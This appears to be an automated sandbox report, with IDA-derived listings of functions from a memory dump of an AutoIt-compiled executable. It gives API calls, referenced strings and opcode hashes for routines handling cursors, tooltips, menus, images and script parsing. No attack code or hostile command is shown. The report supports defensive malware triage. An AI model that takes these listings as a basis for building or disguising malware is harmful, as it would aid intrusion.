Instruction ID: 0aae95c62c379e0c3b4372cc9909968ac004dd741fad63fdcd8d8a49a1280762
Opcode Fuzzy Hash: 5315ae5921f8df5ff91ffa0e1b87f2efb3fad3e865387ecd8bcb67496e346929
Instruction Fuzzy Hash: A5618D71108300AFCB01EF68DC85DAFBBE9EF89310F00492EF591961E1DB74A949CB56

Function 006EABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 006EAC33

Strings

[ALL, xrefs: 006EACD9
ACTIVE, xrefs: 006EAC0E
REGEXP=, xrefs: 006EAC48
ALL, xrefs: 006EACC7
[LAST, xrefs: 006EACE0
CLASSNAME=, xrefs: 006EAC70
[REGEXPTITLE:, xrefs: 006EAC5B
[HANDLE:, xrefs: 006EAC3F
LAST, xrefs: 006EABF8
[CLASS:, xrefs: 006EAC83
HANDLE=, xrefs: 006EAC2C
[ACTIVE, xrefs: 006EAC20

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: ceb8095f30b6aa9a8e777b90a635c506d22f93376d5eaa7ab3e98781be2562dd
Instruction ID: 3b2c41ca7d8d3cbe92ce2bdf204c8c7a7f8b8ec5f5365e7c68da88f2713a2274
Opcode Fuzzy Hash: ceb8095f30b6aa9a8e777b90a635c506d22f93376d5eaa7ab3e98781be2562dd
Instruction Fuzzy Hash: C731E4B0648345AADE08EAA5DD03EFE77AB9F10B10F60442DF402715D1EF156F04C65A

Function 00704FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00705013
LoadCursorW.USER32(00000000,00007F00), ref: 0070501E
LoadCursorW.USER32(00000000,00007F03), ref: 00705029
LoadCursorW.USER32(00000000,00007F8B), ref: 00705034
LoadCursorW.USER32(00000000,00007F01), ref: 0070503F
LoadCursorW.USER32(00000000,00007F81), ref: 0070504A
LoadCursorW.USER32(00000000,00007F88), ref: 00705055
LoadCursorW.USER32(00000000,00007F80), ref: 00705060
LoadCursorW.USER32(00000000,00007F86), ref: 0070506B
LoadCursorW.USER32(00000000,00007F83), ref: 00705076
LoadCursorW.USER32(00000000,00007F85), ref: 00705081
LoadCursorW.USER32(00000000,00007F82), ref: 0070508C
LoadCursorW.USER32(00000000,00007F84), ref: 00705097
LoadCursorW.USER32(00000000,00007F04), ref: 007050A2
LoadCursorW.USER32(00000000,00007F02), ref: 007050AD
LoadCursorW.USER32(00000000,00007F89), ref: 007050B8
GetCursorInfo.USER32(?), ref: 007050C8

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: ec9192362fb1f4451f72a78bef539cb2a333dc4e5193ee6d8fb5a5dcfc824ae0
Instruction ID: 32a651c07c40d5ee175b0311154ebdb51f2a4d8913a0b4dfc2d6d0d41f552ea7
Opcode Fuzzy Hash: ec9192362fb1f4451f72a78bef539cb2a333dc4e5193ee6d8fb5a5dcfc824ae0
Instruction Fuzzy Hash: 193105B1D4831DAADF109FB68C8999FBFE8FF04750F50452AE50DE7280DA78A5008FA5

Function 0071A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0071A259
DestroyWindow.USER32(?,?), ref: 0071A2D3

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0071A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0071A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071A382
DestroyWindow.USER32(00000000), ref: 0071A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00690000,00000000), ref: 0071A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071A3F4
GetDesktopWindow.USER32 ref: 0071A40D
GetWindowRect.USER32(00000000), ref: 0071A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0071A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0071A444

Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC

Strings

0, xrefs: 0071A26F
tooltips_class32, xrefs: 0071A346, 0071A3D4

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: f114c0951ea002a1912502ed33b9066531d26e8c27b8fc48fd4c6b59762498e2
Instruction ID: 0132c6aa821430885c260c320b4a6c6b4c29bd5924d92566b243d86b54f4f37a
Opcode Fuzzy Hash: f114c0951ea002a1912502ed33b9066531d26e8c27b8fc48fd4c6b59762498e2
Instruction Fuzzy Hash: 54716A70140345AFDB25CF2CCC49FAA7BE6FB88700F04852DF985872A0D7B9A946CB56

Function 00714392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00714424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0071446F

Strings

GETITEMCOUNT, xrefs: 00714551
COLLAPSE, xrefs: 007144B5
GETTEXT, xrefs: 007145C2
EXISTS, xrefs: 007144D8
ISCHECKED, xrefs: 007145F2
UNCHECK, xrefs: 0071464B
CHECK, xrefs: 0071448F
GETTOTALCOUNT, xrefs: 00714456
GETSELECTED, xrefs: 0071457F
SELECT, xrefs: 00714620
EXPAND, xrefs: 00714521

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 33328fcfda6c3e2beb548e952469477647d83b25f7d37f3aa4a44e8f804cce7d
Instruction ID: 0d47dce9c3151f6bbb1c6631b5b7d2a55d4d66ad5caf39b945ec88e2e8365099
Opcode Fuzzy Hash: 33328fcfda6c3e2beb548e952469477647d83b25f7d37f3aa4a44e8f804cce7d
Instruction Fuzzy Hash: DF91A0702003018FCF44EF28C451AAEB7E6AF95354F14886CF8965B7A2DB34ED89CB95

Function 0071B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0071B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007191C2), ref: 0071B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0071B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0071B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0071B9C3
FreeLibrary.KERNEL32(?), ref: 0071B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0071B9DF
DestroyIcon.USER32(?,?,?,?,?,007191C2), ref: 0071B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0071BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0071BA17

Part of subcall function 006B2EFD: __wcsicmp_l.LIBCMT ref: 006B2F86

Strings

.icl, xrefs: 0071B82A
.dll, xrefs: 0071B86D
.exe, xrefs: 0071B84A

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: a30abaaa7cfe3b9abdd5cbaac94f71468433d7d33c00ede4b874aa229c8383fa
Instruction ID: a6b876f696a41f5f53150133f28f556d31c66444374436e47bd27b0f6446eab2
Opcode Fuzzy Hash: a30abaaa7cfe3b9abdd5cbaac94f71468433d7d33c00ede4b874aa229c8383fa
Instruction Fuzzy Hash: CB61B0B1500219FAEB14DF68DC45FFE7BACEB08710F108619FA15D61D1DB78A981DBA0

Function 006FA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

CharLowerBuffW.USER32(?,?), ref: 006FA3CB
GetDriveTypeW.KERNEL32 ref: 006FA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA4C5

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

Strings

open , xrefs: 006FA427
close cd wait, xrefs: 006FA4B0
closed, xrefs: 006FA3DF, 006FA3E8
wait, xrefs: 006FA482
set cd door , xrefs: 006FA466
type cdaudio alias cd wait, xrefs: 006FA443
open, xrefs: 006FA3F2
close, xrefs: 006FA3D1

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 7ddf521c9b1e02bab97f343e5d9e5a005e5dd8227b441217cd61c11e9a6f2b40
Instruction ID: e77d6c8d1ad034d77318cd62244ef35f7e2dd225958c05a58390919044229d2c
Opcode Fuzzy Hash: 7ddf521c9b1e02bab97f343e5d9e5a005e5dd8227b441217cd61c11e9a6f2b40
Instruction Fuzzy Hash: 72518FB11143089FCB80EF24C88196EB7E9FF84718F10886DF89A57651DB31ED0ACB56

Function 006EF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,006CE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 006EF8DF
LoadStringW.USER32(00000000,?,006CE029,00000001), ref: 006EF8E8

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,006CE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 006EF90A
LoadStringW.USER32(00000000,?,006CE029,00000001), ref: 006EF90D
__swprintf.LIBCMT ref: 006EF95D
__swprintf.LIBCMT ref: 006EF96E
_wprintf.LIBCMT ref: 006EFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006EFA2E

Strings

Line %d:, xrefs: 006EF968
%s (%d) : ==> %s: %s %s, xrefs: 006EFA12
Error: , xrefs: 006EF9E5
^ ERROR, xrefs: 006EF9C3
Line %d (File "%s"):, xrefs: 006EF957

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 2b3068b3ffc617182f259aecf69c3f1bdc45416a8353a8b0ebfc3ba46a00e05a
Instruction ID: b42af5e622830fa9688ae14c0fd11b8b163ec0547422a28446746a7663b63ce0
Opcode Fuzzy Hash: 2b3068b3ffc617182f259aecf69c3f1bdc45416a8353a8b0ebfc3ba46a00e05a
Instruction Fuzzy Hash: 43413A7290120DAACF45FBE4DD86EEEB77EAF14300F500069F50666092EA356F49CB69

Function 0071BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00719207,?,?), ref: 0071BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BA85
GlobalLock.KERNEL32(00000000), ref: 0071BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0071BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00722CAC,?), ref: 0071BAD7
GlobalFree.KERNEL32(00000000), ref: 0071BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0071BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0071BB36
DeleteObject.GDI32(00000000), ref: 0071BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0071BB74

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 0bdbae83b8f9862f53316b9dacec3dbb98f882ae276a9fed4b32978f3d037048
Instruction ID: efcb5d5242b8ddf7e3c58ad63298303a07800bc85b8141beafc85f5a70d414ff
Opcode Fuzzy Hash: 0bdbae83b8f9862f53316b9dacec3dbb98f882ae276a9fed4b32978f3d037048
Instruction Fuzzy Hash: 63410875600208EFDB219F69DC88EEA7BB8FF89711F108069F909D72A0D7789941DB64

Function 006FD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 006FDA10
_wcscat.LIBCMT ref: 006FDA28
_wcscat.LIBCMT ref: 006FDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006FDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 006FDA63
GetFileAttributesW.KERNEL32(?), ref: 006FDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 006FDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 006FDAA7

Strings

*.*, xrefs: 006FDAE6

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ea1aa5fa4c80af16a3e7357810862565904733e3211910ed5ffd828ebb8e5c26
Instruction ID: a1d60395f78a298ef58b5a2e73ca5d42adede5db1515aaa42d0fd49a660bfdb9
Opcode Fuzzy Hash: ea1aa5fa4c80af16a3e7357810862565904733e3211910ed5ffd828ebb8e5c26
Instruction Fuzzy Hash: E081B4715042499FCB60DFA4C8459BEB7EBBF89310F14882EF989C7351E670E945CB52

Function 0071C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0071C1FC
GetFocus.USER32 ref: 0071C20C
GetDlgCtrlID.USER32(00000000), ref: 0071C217
_memset.LIBCMT ref: 0071C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0071C36D
GetMenuItemCount.USER32(?), ref: 0071C38D
GetMenuItemID.USER32(?,00000000), ref: 0071C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0071C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0071C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0071C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0071C489

Strings

0, xrefs: 0071C33A

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 4d3c1c51d7871dbcf545c6f5601a7373c799f011b440c1cbdf8d4c43b81954aa
Instruction ID: 799732b8c6eaae9f64b0500feced424d1d7c25cb8735384f747fe837d8444ab5
Opcode Fuzzy Hash: 4d3c1c51d7871dbcf545c6f5601a7373c799f011b440c1cbdf8d4c43b81954aa
Instruction Fuzzy Hash: 9B81C1701483519FD711CF98C894AEB7BE9FB88714F00892EF995972D1C778D984CB52

Function 0070731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0070738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0070739B
CreateCompatibleDC.GDI32(?), ref: 007073A7
SelectObject.GDI32(00000000,?), ref: 007073B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00707408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00707444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00707468
SelectObject.GDI32(00000006,?), ref: 00707470
DeleteObject.GDI32(?), ref: 00707479
DeleteDC.GDI32(00000006), ref: 00707480
ReleaseDC.USER32(00000000,?), ref: 0070748B

Strings

(, xrefs: 00707410

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b3e35d98caaec32c579f3aa3f27765bceb8f22e0637ef04a756d10cf732a9e86
Instruction ID: 96e9d1582b28263435fb2a2219ca394170c94a4ad294c1d9292b77c36d9707df
Opcode Fuzzy Hash: b3e35d98caaec32c579f3aa3f27765bceb8f22e0637ef04a756d10cf732a9e86
Instruction Fuzzy Hash: 77514771904209EFDB14CFA8CC84EAEBBB9EF48310F14C52DF95AA7291C735A940CB54

Function 00696A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 006B0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00696B0C,?,00008000), ref: 006B0973

Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00696BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00696CFA

Part of subcall function 0069586D: _wcscpy.LIBCMT ref: 006958A5

Part of subcall function 006B363D: _iswctype.LIBCMT ref: 006B3645

Strings

Bad directive syntax error, xrefs: 006CE79D
EA06, xrefs: 006CE452
#include depth exceeded. Make sure there are no recursive includes, xrefs: 006CE421
Unterminated string, xrefs: 006CE7E4
AU3!, xrefs: 00696B61
Error opening the file, xrefs: 006CE43D, 006CE4B8
>>>AUTOIT SCRIPT<<<, xrefs: 006CE496

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 94606447ad55067e56b87db86f878b49b0f27e9750717f2f1caf58cb8ea90534
Instruction ID: 65b33615549b7d92f165792a046ac0eb2457ee9a376fccdca293a36cc405bc04
Opcode Fuzzy Hash: 94606447ad55067e56b87db86f878b49b0f27e9750717f2f1caf58cb8ea90534
Instruction Fuzzy Hash: 3902AB701083419FCB64EF24C881AAFBBFAEF94314F10491DF49A976A1DB31DA49CB56

Function 006F2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 006F2DDD
GetMenuItemCount.USER32(00755890), ref: 006F2E66
DeleteMenu.USER32(00755890,00000005,00000000,000000F5,?,?), ref: 006F2EF6
DeleteMenu.USER32(00755890,00000004,00000000), ref: 006F2EFE
DeleteMenu.USER32(00755890,00000006,00000000), ref: 006F2F06
DeleteMenu.USER32(00755890,00000003,00000000), ref: 006F2F0E
GetMenuItemCount.USER32(00755890), ref: 006F2F16
SetMenuItemInfoW.USER32(00755890,00000004,00000000,00000030), ref: 006F2F4C
GetCursorPos.USER32(?), ref: 006F2F56
SetForegroundWindow.USER32(00000000), ref: 006F2F5F
TrackPopupMenuEx.USER32(00755890,00000000,?,00000000,00000000,00000000), ref: 006F2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006F2F7E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
